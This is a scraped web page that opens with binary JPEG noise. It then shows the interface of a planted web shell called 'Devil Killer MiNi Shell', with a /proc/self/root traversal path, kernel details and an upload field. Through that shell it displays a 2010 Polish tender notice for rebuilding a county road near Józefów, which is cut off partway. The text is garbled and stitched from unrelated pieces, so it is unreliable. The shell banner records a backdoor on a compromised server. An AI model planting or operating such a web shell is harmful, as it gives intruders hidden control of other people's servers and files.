JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100224/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100224/52312-N-2010.html

<p class="kh_header"><b>Wola Rębkowska: Przebudowa drogi powiatowej Nr 1345W z infrastrukturą towarzyszącą w m. Józefów, Kacprówek i Stary Pilczyn</b><br>
<b>Numer ogłoszenia: 52312 - 2010; data zamieszczenia: 24.02.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Zarząd Dróg w Garwolinie , ul. Przemysłowa 45, 08-410 Wola Rębkowska, woj. mazowieckie, tel. 025 6822215.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pzdgarwolin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa drogi powiatowej Nr 1345W z infrastrukturą towarzyszącą w m. Józefów, Kacprówek i Stary Pilczyn.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie obejmuje przebudowę drogi powiatowej Nr 1345W z infrastrukturą towarzyszącą 
w m. Józefów, Kacprówek i Stary Pilczyn.
Przebudowa drogi obejmuje wykonanie robót przygotowawczych, robót ziemnych, przepustów, odwodnienia korpusu drogowego, podbudowy, nawierzchni, krawężników
i chodników, zjazdów gospodarczych, zjazdów na drogi boczne, umocnienie rowów i ścieków elementami prefabrykowanymi, robót wykończeniowych, oznakowania.
Szczegółowy zakres robót przedstawia poniższe zestawienie.

 ROBOTY  PRZYGOTOWAWCZE
Odtworzenie trasy i punktów wysokościowych przy liniowych robotach ziemnych (drogi) 
w terenie równinnym  w km 0+010 ÷ 5+904 w ilości 5,894 km
Karczowanie drzew (ścinanie drzew i karczowanie pni) o śr. 10 - 15 cm wraz z załadunkiem
 i wywiezieniem dłużyc, gałęzi i karpiny na odl. do 5 km w ilości 11 szt
Karczowanie drzew (ścinanie drzew i karczowanie pni) o śr. 16 - 20 cm wraz z załadunkiem 
i wywiezieniem dłużyc, gałęzi i karpiny na odl. do 5 km w ilości 22 szt
Karczowanie drzew (ścinanie drzew i karczowanie pni) o śr. 21 - 30 cm wraz z załadunkiem 
i wywiezieniem dłużyc, gałęzi i karpiny na odl. do 5 km w ilości 26 szt
Karczowanie drzew (ścinanie drzew i karczowanie pni) o śr. 31 - 40 cm wraz z załadunkiem 
i wywiezieniem dłużyc, gałęzi i karpiny na odl. do 5 km w ilości 64 szt
Karczowanie drzew (ścinanie drzew i karczowanie pni) o śr. 41 - 65 cm wraz z załadunkiem 
i wywiezieniem dłużyc, gałęzi i karpiny na odl. do 5 km w ilości 110 szt
Karczowanie drzew (ścinanie drzew i karczowanie pni) o śr. od 66 cm i więcej cm wraz z załadunkiem i wywiezieniem dłużyc, gałęzi i karpiny na odl. do 5 km w ilości 8 szt
Rozebranie przepustów z rur PCV o średnicy 20 cm w ilości 11 m
Rozebranie przepustów z rur betonowych O 30 z załadunkiem i wywiezieniem materiałów z rozbiórki na odl. do 5 km w ilości 10,5 m
Rozebranie przepustów z rur betonowych O 40 z załadunkiem i wywiezieniem materiałów 
z rozbiórki na odl. do 5 km w ilości 124 m
Rozebranie przepustów z rur betonowych O 60 z załadunkiem i wywiezieniem materiałów 
z rozbiórki na odl. do 5 km w ilości 16 m
Rozbiórka nawierzchni na zjazdach z trylinki z załadunkiem i wywiezieniem materiałów 
z rozbiórki na odl. do 5 km w  ilosci 34 m2
Rozbiórka nawierzchni na zjazdach z płyt wielootworowych  z załadunkiem i wywiezieniem materiałów z rozbiórki na odl. do 5 km w ilości 52 m2
Rozebranie nawierzchni z kostki brukowej z załadunkiem i wywiezieniem materiałów 
z rozbiórki na odl. do 5 km w ilości 55 m2
Rozebranie nawierzchni z betonu grubości 15 cm z załadunkiem i wywiezieniem materiałów 
z rozbiórki na odl. do 5 km w ilości 391,75m2
Rozebranie nawierzchni z mieszanki min. - bit. gr. 5 cm z załadunkiem i wywiezieniem materiałów 
z rozbiórki na odl. do 5 kmw ilości 116,5 m2
Rozebranie nawierzchni z brukowca z załadunkiem i wywiezieniem materiałów 
z rozbiórki na odl. do 5 km w ilości 116,5 m2
Rozbiórka płyty żelbetowej mostu z załadunkiem i wywiezieniem materiałów z rozbiórki na odl. do 5 km w ilości 13,3 m3
Rozebranie przyczółków kamiennych z załadunkiem i wywiezieniem materiałów 
z rozbiórki na odl. do 5 km w ilości 20,16 m3
Rozbiórka murków betonowych z załadunkiem i wywiezieniem materiałów z rozbiórki na odl. do 5 km w ilości 2,8 m3
Rozebranie słupków do znaków drogowych z wywiezieniem materiałów z rozbiórki na odl. do
5 km w ilości 9 szt
Zdjęcie tarcz znaków drogowych z wywiezieniem materiałów z rozbiórki na odl. do 5 km w ilości 
15 szt
Frezowanie istniejącej warstwy bitumicznej przy głębokości do 5 cm w ilości 105,02 m2
Wyrównanie krawędzi istniejącej nawierzchni poprzez odcięcie na pełną głębokość przy szerokości do 10 cm w ilości 101 m2
 ROBOTY  ZIEMNE
Roboty ziemne poprzeczne  na przerzut wykonywane mechanicznie w gr. kat. III ( bez transportu ) 
w ilości 3210 m3
Wykonanie wykopów mechanicznie w gr. kat. III z transportem urobku na nasyp na odl. do 5 km 
z formowaniem i zagęszczaniem nasypów w ilości 441 m3
Wykonanie wykopów w gr. kat. III z wywozem na odkład na odl. do 5 km w ilości 4708 m3
Mechaniczne usunięcie warstwy ziemi urodzajnej ( humusu ) gr. w-wy 10 cm  w ilości 1085,2 m2
z wywozem nadmiaru ziemi roślinnej w ilości 17,38 m3
 PRZEPUSTY
Ułożenie przepustu pod koroną drogi, rury  o średnicy 60 cm na ławie betonowej gr. 20 cm  w ilości 15 m
Wykonanie ścianek czołowych przepustu O 60 w ilości 4 szt
Wykonanie przepustu 2 O 160 cm z blachy falistej w ilości 15,5 m na podłożu gr. 30 cm z kruszywa wraz z umocnieniem wlotu i wylotu przepustu w ilości 66,4 m2 przez obrukowanie na podsypce cem. - piask. gr. 10 cm z zalaniem spoin zaprawą cementową 
  ODWODNIENIE  KORPUSU  DROGOWEGO
Wykonanie studni kanalizacyjnej przelotowej O 1200 mm z kręgów betonowych z włazem typu ciężkiego w ilości 1 szt
Wykonanie studni rewizyjnych O 800 mm z kręgów betonowych z włazem żeliwnym typu ciężkiego w ilości 8 szt
Wykonanie studzienki ściekowej z osadnikiem i kratką ściekową w ilości 2 szt
Wykonanie przykanalików z rur betonowych o średnicy 20 cm w ilości 7 m
Wydłużenie przepustu O 40 na ławie z pospółki gr. 30 cm 2 m
Wykonanie osadnika przy wlocie do studni kanalizacyjnej i ścianki czołowej wylotu przepustu 
O 40 z betonu B-20 w ilości 1,5 m3
PODBUDOWA
Profilowanie i zagęszczenie koryta na poszerzeniach w gr. kat. III w ilości 11194,80 m2
Wykonanie warstwy odsączającej z piasku gr. 25 cm w ilości 11194,80 m2
Wykonanie podbudowy z betonu B-20 gr. 22 cm z wykonaniem szczelin dylatacyjnych w ilości 
558,8 m2
Wykonanie podbudowy grubości 20 cm z kruszywa łamanego stabilizowanego mechanicznie 10636,13m2
Wykonanie podbudowy z betonu asfaltowego o uziarnieniu 0/20, gr. w-wy 6 cm, KR-2 w ilości 9393,84 m2
Wyrównanie profilu istniejącej naw. betonem asfaltowym KR-2 w ilości 1209,34 Mg
Skropienie mechaniczne warstw konstrukcyjnych  emulsją asfaltową w ilości 72092,83 m2
Ułożenie geosiatki 50x50 kN szer. 0,9 m w ilości 9417,60 m2
NAWIERZCHNIA
Wykonanie warstwy wiążącej z betonu asfaltowego o uziarnieniu 0/20, gr. w-wy 7 cm, KR-2 
w ilości 35574,06 m2
Wykonanie warstwy ścieralnej z betonu asfaltowego o uziarnieniu 0/16, gr. w-wy 5 cm, KR-2 
w ilości 34994,32 m2
Wykonanie nawierzchni z kostki brukowej betonowej gr. 8 cm na podsypce cem. - piask. gr. 3 cm w ilości 558,80 m2
KRAWĘŻNIKI  I  CHODNIKI
Ustawienie krawężników betonowych o wym. 15 x 30 na ławie betonowej z oporem 
w ilości 3695 m
Wykonanie chodnika z kostki brukowej betonowej szarej gr. 8 cm na podsypce cem. - piask. gr. 4 cm i podbudowie grubości 10 cm z kruszywa łamanego stab. mechanicznie w ilości 3554,60  m2
Ustawienie obrzeży betonowych o wym. 20 x 6 na podsypce piaskowej w ilości 2551 m
 ZJAZDY  GOSPODARCZE
Wykonanie koryta mechanicznie wraz z profilowaniem i zagęszczeniem podłoża w gr. kat. III, gł. koryta 20 cm. w ilości 1920,60 m2
Wykonanie koryta mechanicznie wraz z profilowaniem i zagęszczeniem podłoża w gr. kat. III, gł. koryta 15 cm. W ilości 1776,95 m2
Wykonanie podsypki piaskowej gr. w-wy 10 cm w ilości 3737,15 m2
Wykonanie podbudowy z kruszywa łamanego, w-wa górna gr. 15 cm w ilości 3737,15 m2
Wykonanie nawierzchni na zjazdach z kostki brukowej betonowej, kolorowej gr. 8 cm na podsypce cem. - pisk. gr. 4 cm w ilości 1960,20 m2
Wykonanie nawierzchni z betonu asfaltowego o uziarnieniu 0/6,3, w-wa ścieralna, gr. w-wy 3 cm, 
KR-2 w ilości 1651,35 m2
Ustawienie krawężników betonowych wtopionych o wym. 15 x 30 x 100 na ławie betonowej bez oporu w ilości 1457 m
Ułożenie przepustów rurowych betonowych o średnicy 40 cm z zakończeniem kołnierzowym 
w ilośći 297 szt na ławie żwirowej gr. 20 cm w ilości 1098 m
 ZJAZDY NA  DROGI BOCZNE
Wykonanie nawierzchni z betonu asfaltowego o uziarnieniu 0/16, w-wa wiążąca, gr. w-wy 6 cm, KR-2 w ilości 131,19 m2
Wykonanie nawierzchni z betonu asfaltowego o uziarnieniu 0/16, w-wa ścieralna, gr. w-wy 5 cm, 
KR-2 w ilości 196,78m2
 UMOCNIENIE ROWÓW I  ŚCIEKÓW  ELEMENTAMI  PREFABRYKOWANYMI
Ułożenie ścieków z elementów prefabrykowanych korytkowych ( 2 elementy szer. 0,6 m) na podsypce cem. - piask. grubości 10 cm w ilości 79,5 m
Umocnienie dna rowu i ścieków elementami prefabrykowanymi korytkowymi na podsypce cem. - piask. gr. 10 cm w ilości 126,5 m
Ułożenie ścieków z trzech rzędów kostki brukowej na podsypce cem. - piask. gr. 5 cm w ilości
 145,04 m2
Umocnienie skarp rowu betonowymi płytami otworowymi o wym. 0,40 x 0,6 x 0,1 m w ilości 
139,20 m2
 ROBOTY  WYKOŃCZENIOWE      
Humusowanie terenu warstwą 5 cm zdjętej ziemi roślinnej z obsianiem skarp w ilości 1302  m2
Uzupełnienie poboczy kruszywem łamanym gr. 10 cm i szer. 0,5 m w ilości 4141 m2
OZNAKOWANIE      
Oznakowanie jezdni materiałami grubowarstwowymi (chemoutwardzalne masy stosowane na zimno)  - linie przerywane, ciągłe  wykonywane sposobem mechanicznym w ilości 1014,33 m2
Ustawienie słupków z rur stalowych o średnicy 50 mm wraz z wykonaniem i zasypaniem dołu 
z ubiciem w ilości 24 szt
Ustawienie podpór o konstrukcji przestrzennej dla znaków drogowych wraz z wykonaniem 
i zasypaniem dołu z ubiciem w ilości 5 szt
Przymocowanie do gotowych słupków tarcz znaków drogowych odblaskowych  w ilości 42 szt
Przestawienie pionowych znaków drogowych wraz ze słupkami w ilości 7 szt
Ustawienie bariery stalowej typ SP 05/2 w ilości 32 m.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.11.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w wysokości 140 000,00PLN (słownie; sto czterdzieści tysięcy złotych)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz robót budowlanych w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia, wykonanych w okresie ostatnich 5-ciu lat tj. 2005/2006/2007/2008/2009r. przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania o charakterze i złożoności porównywalnej z zakresem opisanego w pkt. 1.1 SIWZ, (załącznik Nr 5) wraz z referencjami od poprzednich zamawiających potwierdzające, że roboty budowlane (wykonanie budowy, przebudowy, odnowy, remonty nawierzchni dróg) zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz narzędzi wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie dysponowania tymi zasobami. przewidzianego do wykonania zamówienia - na załączonym formularzu - załącznik Nr 4 - zgodnie z wyszczególnieniem w punkcie 5.3. Instrukcji dla Wykonawców</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami. na załączonym formularzu - załącznik Nr 3, wraz z oświadczeniami, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie, że Wykonawca dysponuje środkami finansowymi niezbędnymi do wykonania zamówienia na załączniku Nr 2</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pisemne zobowiązanie innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia gdy wykonawca sam nie dysponuje takim potencjałem. Wykaz podmiotów, które będą uczestniczyć w wykonaniu zamówienia jako podwykonawcy wraz z podaniem ich nazw, a także zakresu wykonywanych przez nich czynności - załącznik nr 6 SIWZ, kopia dokumentu wadialnego, harmonogram robót zgodnie z załącznikiem nr 7 SIWZ</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
